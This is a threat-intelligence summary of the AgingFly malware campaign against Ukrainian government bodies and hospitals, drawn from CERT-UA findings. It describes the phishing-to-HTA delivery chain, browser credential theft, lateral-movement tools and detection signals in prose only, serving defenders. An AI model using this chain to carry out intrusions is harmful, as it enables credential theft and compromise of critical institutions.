AgingFly Malware Used in Attacks on Ukraine's Government and Hospitals

NEW AGINGFLY MALWARE USED IN ATTACKS ON UKRAINE GOVT, HOSPITALS

1. Overview

• A new malware family named AgingFly has been identified in cyber operations targeting local government bodies and hospitals in Ukraine.
• The attacks focus on stealing authentication data from Chromium-based browsers and from the WhatsApp desktop application.
• CERT-UA attributes these campaigns to a cyber threat cluster monitored as UAC-0247, with potential targets including representatives of the Defense Forces.
• AgingFly is a C# based malware that provides remote control, command execution, data exfiltration, screenshot capture, keylogging, and arbitrary code execution capabilities.
• Communications with the command-and-control (C2) server occur over WebSockets, with traffic encrypted using AES-CBC and a static key.
• A striking feature is that the malware retrieves command handlers from the C2 server as source code and compiles them on the host at runtime, rather than containing pre-built handlers.

1. Attack Chain

• Initial lure: The operation begins with an email posing as a humanitarian aid offer, urging the recipient to click an embedded link.
• Redirect path: The link points to a compromised legitimate site (via a cross-site scripting vulnerability) or to a fake site generated with an AI tool.
• Delivery mechanism: The target receives an archive containing a shortcut file (LNK) that launches a built-in HTA handler, which then connects to a remote resource to fetch and execute the HTA file.
• Deception and execution: The HTA presents a decoy form to misdirect the user and creates a scheduled task that downloads and runs an EXE payload that injects shellcode into a legitimate process.
• Loader stages: Attackers deploy a two-stage loader; the second stage uses a custom executable format, and the final payload is compressed and encrypted.
• Staging and connection: A typical TCP reverse shell or a Ravenshell-like stager is used to establish an encrypted TCP connection to the management server for command execution via the Windows Command Prompt.
• Final deployment: In a subsequent stage, AgingFly is delivered and deployed. A PowerShell script (named SILENTLOOP) executes commands, updates configuration, and retrieves the C2 address from a Telegram channel or other fallback mechanisms.

1. Data Theft and Reconnaissance

• Browser data theft: The attackers use an open-source tool called ChromElevator to decrypt and extract cookies and saved passwords from Chromium-based browsers (Chrome, Edge, Brave) without requiring administrator privileges.
• WhatsApp data access: For Windows, the malware attempts to decrypt WhatsApp databases using ZAPiDESK, an open-source forensic tool.
• Lateral movement and reconnaissance: The actor conducts network reconnaissance and moves laterally, employing publicly available utilities such as RustScan for port scanning, Ligolo-ng for tunneling, and Chisel for remote port forwarding.

1. Compiler-on-Host and Dynamic Command Handling

• Core design: AgingFly is described as a modular malware that compiles command handlers on the host from source code received from the C2 server, rather than shipping with built-in handlers.
• Dynamic capabilities: This runtime compilation enables on-demand extension of capabilities and potential evasion of static detections.
• Trade-offs: While the approach allows a smaller initial payload and flexible functionality, it introduces added complexity, creates a reliance on continuous C2 connectivity, increases the runtime footprint, and can raise detection risk.

1. Technical Characteristics and Artifacts

• Language and tooling: Implemented in C#, providing remote control, file exfiltration, screenshots, keylogging, and arbitrary code execution features.
• Communication and security: C2 communication uses WebSockets with AES-CBC encryption and a static key.
• Data exfiltration scope: Targeted data includes browser credentials and messages from the WhatsApp desktop application, among other potential data sources discovered during investigations.
• Loader architecture: Two-stage loading with a customized, dynamically compiled final payload.
• Staging indicators: Presence of a PowerShell component (SILENTLOOP) used to adjust configuration and obtain or refresh the C2 address.

1. Attribution and Observations

• Investigative stance: CERT-UA has documented the attack chain and noted the use of specific open-source tools and deceptive techniques to obfuscate the campaigns.
• Targets: Local government entities and hospitals in Ukraine are confirmed victims, with possible expansion to defense-related personnel based on forensic evidence.
• Behavioral patterns: The operation blends social engineering, legitimate site compromises, decoy interfaces, and multi-stage payload delivery to establish persistence and control.

1. Related Context and Visual Aids

• Attack chain visuals: Diagrams illustrate the progression from phishing and HTA-driven delivery to the final AgingFly deployment and C2 communications.
• Tooling map: The operation makes use of browser data extraction tools (ChromElevator) and forensic utilities (ZAPiDESK), alongside common reconnaissance and tunneling utilities (RustScan, Ligolo-ng, Chisel).

1. Notable Observations on Defensive Signatures

• Prevalent file types in the chain: LNK, HTA, and JavaScript-based artifacts feature prominently in the delivery and execution steps of the campaign.
• Command handler dynamics: The absence of embedded command handlers and reliance on on-demand source code from C2 distinguishes AgingFly from many conventional trojan families.
• Potential indicators: WebSocket-based C2 traffic with AES-CBC encryption, dynamic runtime compilation events, and PowerShell-driven maintenance tasks present practical signals for detection and monitoring.